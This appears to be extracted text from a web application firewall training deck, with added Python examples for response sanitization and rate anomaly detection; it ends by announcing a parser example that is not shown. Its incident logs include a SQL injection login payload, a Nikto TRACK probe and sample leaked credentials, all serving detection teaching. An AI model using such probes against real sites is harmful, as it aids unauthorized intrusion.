Cache-Control: no-cache, must-revalidate, max-age=0
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html
<br>
<p> /var/htdocs/myapp/ </p> <br>
Credit cards numbers:
<p> 001001001001 </p> <br>
<p> 001002001003 </p> <br>
<p> 001006001004 </p> <br>
<p> 001006001771 </p> <br>
HTTP Response sanitization
Preventing :
• Data leakage
• Credentials spilling
RESPONSE
<p> /var/htdocs/myapp/ </p> <br>
Credit cards numbers:
<p> user1@email1.com: 123456 </p> <br>
<p> user2@email1.com: qwerty </p> <br>
<p> goduser1@email1.com: LOL123 </p> <br>
<p> uadmin1@email1.com: password </p> <br>
REQUEST
Pattern Occurrences > 2
Pattern Occurrences > 3
N/A
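An added example, not from the deck, of the response sanitization and header cloaking above: leak patterns are scrubbed, the Server / X-Powered-By banners removed, and the response blocked once a pattern exceeds the slide's occurrence threshold; the patterns and the sample responses are constructed and illustrative:

```python
"""Added example: response sanitization (scrubbing leaks, cloaking server headers)."""
import re

# (rule name, pattern, occurrences above which the whole response is blocked;
# None = scrub only). Thresholds are the slide's '> 2' and '> 3'; patterns are illustrative.
RESPONSE_RULES = [
    ("credit-card", re.compile(r"\b\d{12,19}\b"), 2),
    ("credential", re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+:\s*\S+"), 3),
    ("path-disclosure", re.compile(r"/var/htdocs/[\w./-]*"), None),
]
CLOAKED_HEADERS = {"server", "x-powered-by"}     # software/version banners


def sanitize_response(headers: dict, body: str):
    """Return (action, headers, body, counts): leaks scrubbed, banners removed, block on excess."""
    counts = {}
    scrubbed = body
    for name, rx, _limit in RESPONSE_RULES:
        scrubbed, counts[name] = rx.subn("[redacted]", scrubbed)
    action = "pass"
    for name, _rx, limit in RESPONSE_RULES:
        if limit is not None and counts[name] > limit:
            action = "block"            # too many hits: this is a dump, not a single record
    cloaked = {k: v for k, v in headers.items() if k.lower() not in CLOAKED_HEADERS}
    if action == "block":
        scrubbed = "<html><body><p>This request has been blocked</p></body></html>"
    return action, cloaked, scrubbed, counts


# Constructed responses modelled on the slide (fake card numbers and credentials).
LEAKY_BODY = (
    "<p> /var/htdocs/myapp/ </p> <br>\n"
    "Credit cards numbers:\n"
    "<p> 001001001001 </p> <br>\n<p> 001002001003 </p> <br>\n"
    "<p> 001006001004 </p> <br>\n<p> 001006001771 </p> <br>\n"
    "<p> user1@email1.com: 123456 </p> <br>\n<p> user2@email1.com: qwerty </p> <br>\n"
    "<p> goduser1@email1.com: LOL123 </p> <br>\n<p> uadmin1@email1.com: password </p> <br>\n"
)
ORDER_BODY = "<p>Your order 100020003000 shipped from /var/htdocs/myapp/</p>"
SERVER_HEADERS = {"Server": "Apache/2.1 (Unix) PHP/7.1.2", "Content-Type": "text/html"}
```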
61. 70295
©
Client Interrogation
Who is the client ?
1. Simple bot
2. Full browser bot
3. Full human bot
Definition: HTTP client inspection for
understanding who the HTTP client is
• Pros
• Helping with identifying bots/ automation
• Examining Attack Agent
• Works beyond IP level
• Powerful with other detection
• Cons
• Adds a round trip, delays the load time
• Can be tricked
• No blocking
Types
I. CAPTCHA
II. Client capabilities L1-3
III. Source ID (SID)
Attacks: bot /botnets for any attacks.
Automated traffic Attack agents
62. 70295
©
User Browser
WAF - CI
App
First request GET /sell.php
GET /sell.php (not verified)
Client – interrogation
Return interrogation results
Forward request
HTTP Response (verified)
interrogation Tests:
• CLI ?
• Support JS?
• Support cookie ?
• Mouse movements ?
• Event sequence ?
• UA fit resolution ?
• Framework ?
GET /img.png (verified )
GET /img.png (verified)
HTTP Response (verified)
HTML rendering
interrogation results :
If failed – drop / block request
if pass – forward
Client interrogation – concept
63. 70295
©
Type the words :
SIRT#1
AUTO
Type the words :
SIRT#1
??!?!?!!
SIRT#1
Human
Not human
Client interrogation I : CAPTCHA
65. 70295
©
IP:Y
IP:X
IP:Z
Client interrogation III : SID
IP:X SID: 9883 10 RPS
IP:X SID: 1253 50 RPS
IP:Z SID: 4948 100 RPS
IP:Z SID:1151 20 RPS
IP:Z SID: 2222 12 RPS
IP:Y SID: 2873 0 RPS
SID: 9883
SID: 1253
SID: 2873
SID: 1151 SID: 4948
SID: 2222
Measuring IP/SID Binding
Client interrogation
Who are you ?
68. 70295
©
❑ SMS
❑ Messaging – slack
❑ Email
ALERT
To: WAF admin
❑ DASHBOARD – ALERT / CRITICAL
❑ GRAPHS – VISUAL
❑ STATISTICS – TABLES
❑ LOGS – REQUEST LOGS
Alert – the most basic but the most important: the money time,
and the security visibility feedback loop
Browser
User
IP
Attacker
WAF Reporting (GUI)
External alert utility
69. 70295
©
Your traffic is violating the site policy.
If this continues, please contact our support
111-111
Block ID: 10ABC
TCP FIN / RESET
Drop connection
Semi blocking:
Scrubbing / Stripping / Cloaking
Browser
BLOCK
This request has been blocked
To: End Users
Blocking page
70. 70295
©
• Limiting rate of RPS on specific IP
• Limiting RPS on site
• Limiting RPS on specific URL
• Limiting time
• Limiting access – 4 hours ban
LIMIT
IP
q
search.php
index.php
IP
• Rate limit on the client side
Advantages
▪ Slowdown / Delay attack
▪ Less aggressive than blocking
▪ Typically works on anomalies
• Rate limit on the server side
71. 70295
©
Send users to honeypot for inspections
Redirect the browser to the main page
FOLLOW UP Advantages
▪ Delay attack
▪ Hides blocking actions
▪ Investigating activity
302: HOME
Fake app keep them busy
Redirect
Honeypot
72. 70295
©
Your traffic is violating the site policy.
If this continues, please contact our support
111-111
Block ID: 10ABC
Browser
This request has been blocked
Wrong username or password,
please try again:
Login
Forgot password
Password
User:
Home | Buy| login| Help
Retaliation
Not available
Home | Buy| login| Help
Please try again later
Soft Block
Hard block
FOLLOW UP
73. 70295
©
PARSER ENGINE TRAPS ENGINE ENFORCER ENGINE
REQUEST ARRIVE
WAF DATA PLANE REQUEST/RESPONSE PROCESS
PARSER ENGINE
TRAPS ENGINE
ENFORCER ENGINE
RESPONSE
ARRIVE
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
Protocol
Payload
User input
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
Protocol
Payload
User input
ALERT
BLOCK
LIMIT
FOLLOW UP
ALERT
BLOCK
LIMIT
FOLLOW UP
75. 70295
©
WAF – inline traffic inspector
WEB APPLICATION
Application/s
Request
handler/s
Database/s
Expected Traffic Footprint
Attack Traffic Footprint
No Services
for you
WEB APP OWNER
✓ Allow valuable traffic
✓ Stop attack
Welcome P D E
77. 70295
©
Rules Concept
PROTOCOL
PAYLOAD – HEADERS
USER INPUT
SIGNATURES
ANOMALY
RESTRICTIONS
CLIENT INTERROGATION
ALERT
BLOCK
LIMIT
FOLLOW UP
• Detection
ENFORCER
TRAPS
PARSER
E D P – Entity, Detection, Prevention action (PA)
Example rule: Entity: user input – parameter value | Detection: Signature – SQLi "select * from" | Prevention: Blocking page
79. 70295
©
❑ Allow
❑ Monitor
❑ Block
Brute force Prevention Rules
E D P
E D P
E D P
E D P
P
ADDoS Prevention Rules
Vulnerability Hunting Prevention Rules
E D P
Bot/Botnet Prevention Rules
APP
E D P
E D P
E D P
E D P
E D
80. 70295
©
A. What you want
B. How to do it
E
D
P
?
?
?
• App Risk level
• Human labor
• WAF capabilities
WAF policy – building
82. 70295
©
Labor
How many people
• Knowledge
• Skill sets
• Experience
Working hours: 1 person per 20 base policies
Off hours: 1 person – monitoring / acting
• Web app type: traffic, users, criticality
• Number of policies / apps (total)
• Policy complexity – number of PE’s (features)
• Coverage – follow the sun
*Estimations
85. 70295
©
How to build a policy
Create Rule
Verify Rule
Enforce Rule
A good rule:
▪ No false positive
▪ Blocking the defined criteria
E D P
C V E
Pass traffic:
• No hits – enforce
• Hits – keep in alert mode
• Define the entity/ies
• Configure the detections
• Apply prevention
action (beyond alert)
86. 70295
©
Ways to build policies
➢ Manual
➢ Heuristics
➢ Statistics
➢ Aggregations
Protocol
Payload
User input
SIGNATURES
RESTRICTIONS
ANOMALY
CLIENT
INTERROGATION
ALERT
BLOCK
LIMIT
FOLLOW UP
Define entity
Config detection
Apply prevention action
Traffic
Trusted traffic concept
No attack traffic.
If hit -> false positive
88. 70295
©
E D P
E D P
Valuable user – blocked on false positive rule
Real Attack
Valuable user
Why ?
False Positives – the enemy of security value
False positive – identifying good traffic as bad traffic,
i.e. the rule gets hit but it is not an attack
89. 70295
©
P
E D P APP
Create rule
Verify rule
Enforce
E D P
E D
Alarm – no Hit
Alarm - Hit
Blocking – Hit
Outcome:
a) Hits are false positives – refine or keep in alert
b) Hits are attacks – blocked
c) Hits are FP and RA – separate the rules or add other mitigations
d) No hits – block, per the timeline
e) Hits (few) – keep in alert (default)
Rules maturity / life cycle
Timeline
90. 70295
©
Entity
Bad parsing
Unsupported protocol
Bad payload
Detections
Signatures – known word
Anomaly – wrong thresholds
Restrictions – legitimate metachar
Client int – wrong ID
Prevention
Block – good users
Honey pot – wrong data
False positive examples
91. 70295
©
WAF Policy – Features
Brute force Rules
E D P
E D P
E D P
E D P
E D P
E D P
E D P
ADDoS Rules
Vulnerability Hunting Rules
E D P
E D P
E D P
Bot/Botnet Rules
APP
WAF
POLICY
❑ Signature
❑ User agent
❑ Headers
❑ User input
❑ Normalization engine
❑ Brute force protection
❑ Distributed brute force
❑ Prevention
❑ Ban for X hours
❑ CAPTCHA
❑ Bot protection
❑ Web scraping protection
❑ Log all transactions
❑ Slow post detection
93. 70295
©
App health
Incidents
WAF Security level
Traffic
E:H D:S BLOCK
E:URL D:A ALARM
1IP 100 Req
Critical
E:IP D:R RATE LIMIT
Medium
High 1IP 10Req
10IP 1000Req
Brute force App DDoS Web Exploit
60% 70% 50%
[Chart: WAF security level per app, App 1–App 4, 56%–72%]
SIRT WA-CAV
WAF Health
Load avr% Numbers
CPU 65% 16 core
Memory 55% 64GB
Throughput 35% 6.66G
RPS 25% 111,000
99 LIVE I’M OK
94. 70295
©
Aggregated 21.21k 23.57 36.72k
10.10.1.12 2.75k 3.05 4.08k
172.29.46.44 2.26k 2.51 5.27k
192.168.1.1 2.25k 2.50 3.10k
172.16.184.126 2.23k 2.48 4.64k
192.168.1.12 2.01k 2.23 2.82k
[Chart: RPS @ URL / over 21 intervals]
Top URL’s RPS
/ 21.21k
/search.php 2.75k
/login.php 2.26k
/sell.php 2.25k
/user_login.php 2.23k
/blog.php 2.01k
Statistics
[Graph: RPS @ Login.php by source network 10.10.10.0, 10.10.20.0, 10.10.30.0, 10.10.40.0, 10.10.50. and total]
Graphs
95. 70295
©
Security Incident log
R1
GET /314355195369564852’2.php HTTP/1.1
User-Agent: (/Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101/,;/>
Pragma: no-cache
Cache-Control: no-cache
Content-Length: -40
Host: sirt.club
R2
TRACK / HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent:: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKip/537.36
(KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Trace-Test: Nikto
Incident
Incident
Incident
Incident
Incident
R1
R2
R3
R4
Rx
R1
GET /3143551953695648522.php
HTTP/1.1
User-Agent: Mozilla/5.0
Host: sirt.club
Entity: 3143551953695648522.php
Detections: meta char in URL ‘
Prevention: blocking page
Time: 11:12:13
Source IP: 10.0.0.138
R3
OPTIONS /API%20/V1/login HTTP/1.1
User-Agent: Mozilla/5.0 Firefox/11.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Host: sirt.club
Aka: request/Response logs
97. 70295
©
Security Incident Response
▪ Apply to security product/service
▪ Deal with modern threat landscape
▪ Small clear actions
▪ Rapid process
▪ Agile IR
❑ Fast mitigation
❑ Easy to use
❑ Scalable
❑ Repeatable
❑ Measurable
The Money Time
100. 70295
©
► Security Device - WAF Protection elements ( policy )
INVOCATION TYPES
► 3rd party security / monitoring software or services
► Humans – customer complaints, notification from other departments' personnel
Hello support: your app is NOT working !?!?
SUPPORT
LOAD
App dude: hey, it's
eating resources $$$
101. 70295
©
INVOCATION – ACT!
▪ Dashboard alert
▪ Email
▪ SMS
▪ Instant messaging
▪ Phone call
WAF notification center
ATTACK!
Message:
• What happened:
• How bad it looks:
• How long:
102. 70295
©
1. AM I
• S1 – Service down
• S2 – Major impact
• S3 – General impact
Declare the incident type and Determine the impact
Am I under attack ?
RA – Real attack
FP – False positive
FA – False alarm BTR
Impact
incident type
103. 70295
©
1. AM I
• Severity: S1
• Status: Active Attack
• Damage: Major
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now (4H – 12H)
• Severity: S2
• Status: Active / Imminent
• Damage: Moderate / Potential
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now / Soon (12H – 24H)
• Severity: S3
• Status: Security Related
• Damage: Minor
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Soon/ Later (24H – 3D)
104. 70295
©
1. AM I
• S1 – Service down
• FP: Mass
• Damage: Visible Blocking
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now (4H – 12H)
• Severity: S2
• FP: Many
• Damage: Affecting Traffic
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Now / Soon (12H – 24H)
• Severity: S3
• FP: Specific
• Damage: Passive FP
• Affecting:
❑ Service
❑ Data
❑ Compute
• Act: Soon/ Later (24H – 3D)
105. 70295
©
2. MITIGATION
I. Searching Suspicious indicators (3SIN)
II. Compose Prevention rule (PR)
How to mitigate (Seek & Destroy )
Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR)
• Detection + Prevention = Mitigation
106. 70295
©
I. Suspicious indicators
2. MITIGATION
Attack Elements
▪ Vulnerability
▪ Attack Surface
▪ Attack Agent
▪ Exploit
▪ Attack Vector
▪ AMO
Protection Elements
▪ Signatures - Pattern matching
▪ Anomaly - Aggregation and thresholds
▪ Restrictions - Allow / Block lists
▪ Client Interrogation - HTTP client inspection
GRAPHS
STATISTICS
LOGS
DASHBOARD
REPORTING
108. 70295
©
2. MITIGATION
SIRT FIP
Forensic Investigation Procedure
Classify
Sources
Examine
Patterns
Internet
POST / login.php HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
Content-Length: 59
User-Agent: Apache-HttpClient/4.5.7 (Java/1.8.0_221)
Content-Type: application/x-www-form-urlencoded
username=' or 1=1--&password=123456action=login
I. Suspicious indicators
109. 70295
©
2. MITIGATION
I. Suspicious indicators (3SIN)
II. Prevention rule (PR)
How to mitigate (Seek & Destroy )
Find Suspicious Indicators (SIN) & Compose Prevention Rule (PR)
• Protection Rules – general policy - policy
• Prevention Rule – specific attack - SIR
110.
2. MITIGATION
II. Prevention Rule (PR)
Prevention Rule (E D P) per WA-CAV: BRUTE FORCE, ADDoS, VULNERABILITY HUNTING, AUTOMATED ATTACKS
• Wide vs narrow rules
• Specific rule vs general rule
Goal:
• Prevention rule / Features
• Few prevention rules / Features
111.
3. RESPONSE
I. Apply mitigation strategy
II. Monitor mitigation
Apply prevention rule and verify attack mitigation
Response – Apply & Verify
114.
Response – Apply & Verify
[Chart: requests to URL / per interval 1–21, y axis 0–2500] ✓ BTR – monitoring attack
[Chart: requests to URL / per interval 1–21, y axis 0–3000] ✓ BTR – EoA – end of attack
3. RESPONSE
• Return – bypass
• Return – different approach – same attack
• Revenge – other attack
115.
BTR
Back To Routine (BTR)
Declaring Back to Routine when the attack is being blocked or the attack has stopped
Win
IR Win
✓ Damage evaluation report
✓ Severity is 0
117.
Incident name:
CAV type:
Severity:
App name:
App type:
Attack type:
Win/Lose:
Attending:
▪ SIRT iMgr _________
▪ SE Focal____________
▪ App Dev___________
▪ Dev Ops___________
▪ Mgmt __________
Opportunities:
▪ Short term
▪ Long term
Cost:
o Direct ______________
o Indirect ____________
o 3rd party ____________
Total IR cost: _____________
Incident details:
▪ High lights ________________
▪ Low lights _________________
▪ Response time _________________
▪ Recovery time
▪ Working time
AE List:
PE List:
Feature name:
RCA:
Damage control:
▪ Auditor_____________
▪ CxO notification: Y/N datetime
118.
1. AM I -> 2. MITIGATIONS (SEEK -> DESTROY) -> 3. RESPONSE (APPLY -> VERIFY) -> FINE TUNE (RA / FP: SEEK -> FIX) -> BTR
132.
WAF Strategies
[Diagram: NF -> App srv -> Web app (x3) -> MESH, with CI / A / SIG/R detections placed at each WAF location]
WAFx1: Edge / Perimeter
WAFx2: Edge + Perimeter
WAFx3: Edge + Perimeter + Mesh
135.
Security Management – types: Managed Security (WAF aaS) | Security Management | Full Security Management
Managed Security (WAF aaS) – Vendor aaS:
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups
❑ Create / updates
❑ Infrastructure - upgrades
❑ Deployment
❑ OS – Scaling
Security Management – You:
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups - updates
❑ Create / update
❑ Infrastructure
❑ Deployment - upgrades
❑ OS – Scaling
Full Security Management – You:
❑ Security report
❑ SIR
❑ Policy
❑ Configuration
❑ Setups
❑ Create / updates
❑ Infrastructure - upgrades
❑ Deployment
❑ OS – Scaling
137.
WAF architecture capabilities (DSMM)
App ❑ Classic ❑ Modern ❑ Mix
Environment
Cloud ❑ Cloud: Public ❑ Cloud: Private ❑ Multi cloud ❑ Hybrid (Cloud <-> OP)
On Prem ❑ On Prem: Shared Hosting ❑ On Prem: Dedicated hosting ❑ Multi On Prem ❑ Hybrid (OP <-> Cloud)
Management
Management ❑ For you ❑ Semi ❑ You
WAF locations ❑ Edge ❑ Perimeter ❑ Perimeter (360) ❑ Mesh ❑ MonoMesh
Software
SW type ❑ HW OS SW ❑ OS SW ❑ SW
Virtualizations ❑ vOS ❑ vSW - Container ❑ vSW – K
Security Mgmt – Sec OPS
Policy level ❑ ID/PS ❑ Bot MGR ❑ WAF ❑ WAF NG
Security Reporting ❑ Security center (learning) ❑ WAF reporting ❑ Graphs ❑ Risk reporting ❑ Statistics ❑ Mitigation reporting ❑ Event log ❑ Forensics
OPS
Deployment ❑ ISO file ❑ RPM ❑ VM image
Config ❑ API ❑ Config file ❑ GUI
138.
“Keep it up to date and Never drop the ball, YOU are the last in line and own it”
Policy
Update
Upgrade
MGMT
HA
Utility
141.
Platform
Bare: Hardware – Operating System – Network
Virtual - OS: Hardware – Operating System – Network – vOS vOS vOS
Virtual - container: Hardware – Operating System – Network – C1 C2 C3
Virtual - Pod: Hardware – Operating System – Network – P1 P2 P3
SW type (HW OS SW / OS SW / SW):
• WAF Software + Operating System + Hardware
• WAF Software + Operating System
• WAF Software
Deployment ❑ ISO ❑ SW
143.
High availability
AKA: Fault tolerant – when the master WAF fails
Active / Active: two units, each OS + WAF + Hardware
Active / Stand By: two units, each OS + WAF + Hardware
N+1 concept
144.
Load management: Load balancing | Cluster | Scaling
• Load balancing: WAF 1, WAF 2, WAF 3 – Active / Active / Active
• Cluster: N+1 – Primary (A), Secondary (Burst); Fault tolerance: (Stand By) – Stand By, Stand By
• Scaling: Traffic (RPS) over Time – WAF 2, WAF 3 added; New / Old
145.
WAF capacity planning – LB
Session persistence: New session -> WAF # 1 / WAF # 2 -> App # 1 / App # 2
Stand By – online
146.
WAF capacity planning – cluster
[Platform diagram as on slide 141: Hardware – Operating System – Network, with Virtual - OS (vOS vOS vOS), Virtual - container (C1 C2 C3) and Virtual - Pod (P1 P2 P3)]
WAF cluster (SB, SB) | WAF cluster
Stand By – online
148.
Upgrade / Updates procedure
Active / Standby (CLIENTS -> A = Active unit, B = Standby unit):
a) Update /Upgrade on B (SB)
b) Testing – smoke test or rollback
c) Switching to active unit (A->B)
d) Make A stand by
e) Update /Upgrade on SB (A)
f) Verify ok
New / old (A = old, B = new):
a) Create new from ISO – B
b) Import config (from A)
c) Testing – smoke test or new install
d) Traffic route new traffic - B
e) Kill old WAF - A
149.
Centralized Management (CM)
Policies: POLICY ALL/APP1, POLICY ALL/APP2, POLICY LOGIN/APP2, POLICY 20, POLICY 30, POLICY 40
Services: SERVICE: IP:80, SERVICE: IP:8080, SERVICE: IP:8008
Apps: APP1, APP2, App # 20, App # 30, App # 40
152.
Configuration
1. DATA PLANE
2. CONTROL PLANE – SETTINGS
3. REPORTING - VISUALIZATION
GUI | API | CONFIG File
E D P
153.
Configuration – GUI
Policy Name: main_App | notification (21) | incident log | support panel
Create New Parameter
Parameter name: q
Parameter value: *
Signatures: ❑ Information ❑ Generic ❑ CVE
Create
search.php | CLIENTS
Online help | Contact vendor support
154.
Configuration – API
Clients (Mobile client App, Mobile Browser, LT/ PC Browser, LT/ PC CLI, 3rd party) -> { API } -> NF -> WAF NG
WAF API Collection:
Policy {Main_app}
Parameter {q}
Signatures {specific CVE family}
Prevention action {alert , blocking page}
155.
Configuration – Config file
NF -> WAF NG { API }
WAF config file:
Policy: Main_app
<config>
Define Parameter : q
Configure signatures – specific CVE
Apply – prevention action: alert , blocking page
</config>
#load new config
156.
Log format:
✓ Request: URL, Headers, QS, PD, Meta character
✓ Response: headers, post data, meta data
✓ WAF: ALL reporting (raw)
✓ WAF meta data: signature, hit on, CRLF, encoding
Set ups
Ingress -> Log repository -> Indexing -> Reporting -> Egress
✓ Sys log
✓ SIEM
✓ Repo
158.
Reporting
1. DATA PLANE - WAF ENGINES
2. CONTROL PLANE – SETTINGS
3. REPORTING - VISUALIZATION
SECURITY REPORTING: GRAPHS, STATISTICS, LOGS, DASHBOARD
SUPPORT REPORTING – WAF LOGS: AUDIT, MAINTENANCE, SYSTEM
o Audit – who did what – changes to policy
o Maintenance – update / upgrade fails
o System – memory, configuration
159.
SUPPORT REPORTING – WAF LOGS (2. CONTROL PLANE – SETTINGS, 3. REPORTING - VISUALIZATION)
o Audit – who did what – changes to policy
#User admin access from IP X on Sunday 1:01 AM GMT
#User admin change policy to allow access from IP Y
#User admin reboot me
o Maintenance – update / upgrade fails
Upgrade is needed to version X
Update failed
Updates for version X is success
o System – memory, configuration
Resources allocation memory increase in 5M total of 16GB
CPU spike to 90% for 10 minutes
160.
Utilities
Logging ❑ Local ❑ Remote ❑ All request ❑ Hits only
Log Repository ❑ Internal ❑ External ❑ Size: 6T ❑ Time: 6-month request ❑ Fault tolerance
3rd party ❑ ICAP ❑ Network FW integration
CM ❑ Local ❑ Dedicated ❑ CP utility ❑ Pull / push config ❑ Update/ upgrades ❑ WAF centralized report ❑ Policy ❑ Traffic aggregation (unified reporting)
Updates and upgrades
Updates ❑ Break Fix ❑ CVE updates ❑ New features ❑ Hotfix ❑ Engineer hot fix ❑ Full update file ❑ GUI ❑ API ❑ Config ❑ RPM ❑ SW ❑ ISO – OS + SW ❑ ISO – SW
Upgrade ❑ Migration tools ❑ WAF Config restore ❑ Rollback
Upgrades / upgrade schema ❑ Stand by / Active ❑ Active / Active ❑ New / old
Life time policy ❑ Sustain release ❑ Feature release ❑ Product life time ❑ Support life time
HA
HA ❑ Load balancing ❑ Cluster ❑ Scaling
Support tools
Support reporting ❑ Audit log ❑ Maintenance ❑ System ❑ Debug
Policy export – restore ❑ Text ❑ HTML ❑ Binary ❑ JSON ❑ XML ❑ Manual GUI ❑ API
162.
WAF Management
Policies: POLICY ALL/APP1, POLICY ALL/APP2, POLICY LOGIN/APP2, POLICY 20, POLICY 30, POLICY 40
Services: SERVICE: IP:80, SERVICE: IP:8080, SERVICE: IP:8008
• Site level
• Zone level
• App level
CI A SIG/R
• Edge -> screening
• Perimeter -> classic
• Mesh -> microservice
167.
WA-CAV policy – Multi layer security solution
Anti auto -> AUTOMATED ATTACKS
Anti web exploit -> WEB EXPLOITS
Anti bf -> BRUTE FORCE
Anti floods -> ADDoS
CI: First request
CI: First response
A: Session opening rate
A: RPS increase on Session
S: User agent
A: RPS from IP
A: RPS to URL
A: RPS from Geo
A: RPS from session
A: RPS from IP to login URL
A: RPS from any IP to login URL
A: RPS from Geo to login URL
A: RPS from session to login URL
S: Specific CVE exploits
S: Generic exploits
R: Meta char on parameter values
R: Anti evasions
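The aggregation-and-threshold kind of anomaly rule listed above (A: RPS from IP, A: RPS from IP to login URL), written out as an added example that is not code from the deck; the window size, the limits, the login URL and the replayed traffic are all constructed for the illustration.

```python
# Added example, not from the deck: an "Anomaly - aggregation and thresholds"
# trap for two rules of the WA-CAV policy: RPS from IP, and RPS from IP to
# the login URL. Window size, limits, URL and traffic are all constructed.
from collections import defaultdict, deque

LOGIN_URL = "/login.php"        # assumed login entity (see the FIP sample request)
WINDOW_SECONDS = 10.0           # sliding window the counters aggregate over

# (rule name, aggregation key, limit inside the window, prevention action)
RULES = [
    ("A: RPS from IP",
     lambda ip, url: ip, 50, "LIMIT: rate limiting (RPS)"),
    ("A: RPS from IP to login URL",
     lambda ip, url: (ip, url) if url == LOGIN_URL else None, 5,
     "BLOCK: blocking page"),
]


class AnomalyTrap:
    """Counts requests per aggregation key inside a sliding time window."""

    def __init__(self):
        self._windows = defaultdict(deque)    # key -> timestamps still in window

    def _count(self, key, ts):
        q = self._windows[key]
        q.append(ts)
        while q and ts - q[0] >= WINDOW_SECONDS:   # evict expired timestamps
            q.popleft()
        return len(q)

    def observe(self, ts, ip, url):
        """Feed one request; return the (rule, action) pairs it triggers."""
        fired = []
        for name, keyfn, limit, action in RULES:
            key = keyfn(ip, url)
            if key is None:                     # rule does not apply to this URL
                continue
            if self._count((name, key), ts) > limit:
                fired.append((name, action))
        return fired


def burst_logins():
    """8 login attempts in 4 s from one IP: the login-URL rule fires 3 times."""
    trap = AnomalyTrap()
    hits = []
    for i in range(8):
        hits.extend(trap.observe(100.0 + i * 0.5, "10.0.0.138", LOGIN_URL))
    return hits


def spaced_logins():
    """Same 8 attempts spaced 3 s apart: never more than 4 in any 10 s window."""
    trap = AnomalyTrap()
    hits = []
    for i in range(8):
        hits.extend(trap.observe(100.0 + i * 3.0, "10.0.0.138", LOGIN_URL))
    return hits


def browsing():
    """20 product-page requests in 4 s from a user IP: under both limits."""
    trap = AnomalyTrap()
    hits = []
    for i in range(20):
        hits.extend(trap.observe(100.0 + i * 0.2, "10.0.0.7", "/products"))
    return hits


if __name__ == "__main__":
    print(burst_logins())   # 3 x ('A: RPS from IP to login URL', 'BLOCK: blocking page')
    print(spaced_logins())  # []
    print(browsing())       # []
```

The spaced case is the one to watch when tuning: a rule keyed only on a count without a window, or with a window longer than the attacker's pacing, turns into the FP/FN trade-off the rule maturity slide describes.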
168.
Parser - Entities
Protocols ❑ HTTP 1.1 ❑ API ❑ Mobile API
Payloads ❑ Text ❑ JSON ❑ XML
User input ❑ Login ❑ Search text ❑ Posting
Traps - Detections
Signature ❑ Informational (W,B,D) ❑ Generic exploits (W,B,D) ❑ Specific exploit (W)
Anomaly ❑ Request per second (W,B,D) ❑ Failed login (B) ❑ Session opening (W,B,D)
Restriction ❑ Character sets (W,B) ❑ RFC & evasion (W,B,D) ❑ Flow
Client interrogation ❑ CAPTCHA (W,B,D) ❑ Client capabilities (W,B,D) ❑ Source ID (SID) (W,B,D)
Enforcer - Prevention Action
ALERT ❑ GUI: dashboard / iLog [M] ❑ Email / SMS ❑ Instant messaging
BLOCK ❑ Blocking page [M] ❑ TCP FIN / RESET /Drop [M] ❑ Stripping / Cloaking
LIMIT ❑ Rate limiting (RPS) [M] ❑ Time limiting [M] ❑ Session limiting
FOLLOW UP ❑ Redirect to main / honeypot ❑ Soft Blocking ❑ Retaliation
Protection elements -> PR
169.
CI
A SIG/R
Scrubbing center
Threat actors
Risky users/ traffic
MVU – Most valuable users
PVU - Potential valuable users
Authorized automation
Users group – WAF as a traffic manager
Partners
3rd Party
171.
Forensic Investigation Procedure (SIRT FIP)
Classify Sources
• Source IP – RPS
• Source IP – sessions
• Source IP geo
Classify client
• Simple client / simple bot
• Browser / full browser bot
• Human / full human bot
Classify Pattern
• Well formed
• Structure
• Position
Classify Actions
• CRUD
• Flow
• Timeline
Verdict (S / M / V)
• V: Clearly good user request
• M: Clearly harmful request
• S: Potentially harmful
Prevention Action:
✓ Allow
✓ Exempt – all/ partial
X Block – specific request / IP
X Shun – all traffic from IP/session
? Monitoring – need more data
172.
HTTP Client Classification (Pass / Fail)
Simple client -> Simple bot: CI – L1 Browser base test
Browser client -> Full Browser Bots: CI – L2 Browser Attributes
Human client -> Full Human Bots: CI – L3 Mouse movements
173.
Classify sources: Clients / sources / users – RPS – Historical
Device | IP | Sessions | RPS | Flow / Top URL’s
Laptop | New | 10 | 100 | Register -> Login -> Cart -> Pay
PC | Returning | 15 | 1000 | Browse_IS -> Login -> Pay
IOT | New | 1000 | 25000 | /ping, /swcheck
Mobile phone – browser | Returning | 150 | 3500 | /sell, /browser?ID=
Mobile phone – App | New | 2 | 30 | appmobile/V1/
174.
Security Request log
R1
GET /314355195369564852'2.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 0
Host: sirt.club
R2
TRACK / HTTP/1.1
Connection: Keep-Alive
Host: sirt.club
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
Trace-Test: Nikto
R3
OPTIONS /API/V1/login HTTP/1.1
User-Agent: Mozilla/5.0 Firefox/11.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Host: sirt.club
Incident list: one Incident per request – R1, R2, R3, R4, Rx
Incident record for R1:
GET /3143551953695648522.php HTTP/1.1
User-Agent: Mozilla/5.0
Host: sirt.club
Entity: 3143551953695648522.php
Detections: meta char in URL '
Prevention: blocking page
Time: 11:12:13
Source IP: 10.0.0.138
Classify Pattern
• ETF
• ATF
• User input
• Well known
• Context
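A parser that turns raw requests like R1–R3 above into the incident record shape the slide shows (Entity / Detections / Prevention / Time / Source IP), added here as an example and not the deck's code; the three detections, the method allow-list and the sample requests are constructed for the illustration, not a real WAF rule set.
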